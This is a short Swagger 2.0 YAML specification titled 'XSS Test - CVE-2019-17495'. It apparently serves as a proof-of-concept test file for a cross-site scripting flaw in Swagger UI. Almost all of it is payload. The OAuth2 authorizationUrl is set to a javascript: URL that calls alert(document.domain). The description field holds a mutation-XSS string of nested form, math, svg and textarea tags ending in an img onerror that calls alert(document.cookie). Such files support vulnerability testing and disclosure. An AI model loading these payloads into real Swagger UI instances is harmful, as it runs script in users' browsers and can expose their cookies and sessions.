swagger: '2.0'
  securityDefinitions:
    a:
      type: oauth2
      authorizationUrl: javascript:alert(document.domain)//
      flow: implicit
      scopes: {}
  info:
    version: "1.0.0"
    title: XSS Test - CVE-2019-17495
    description: |
      <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
  paths:
    /:
      get:
        security:
          - a: []
        responses:
          200:
            description: OK
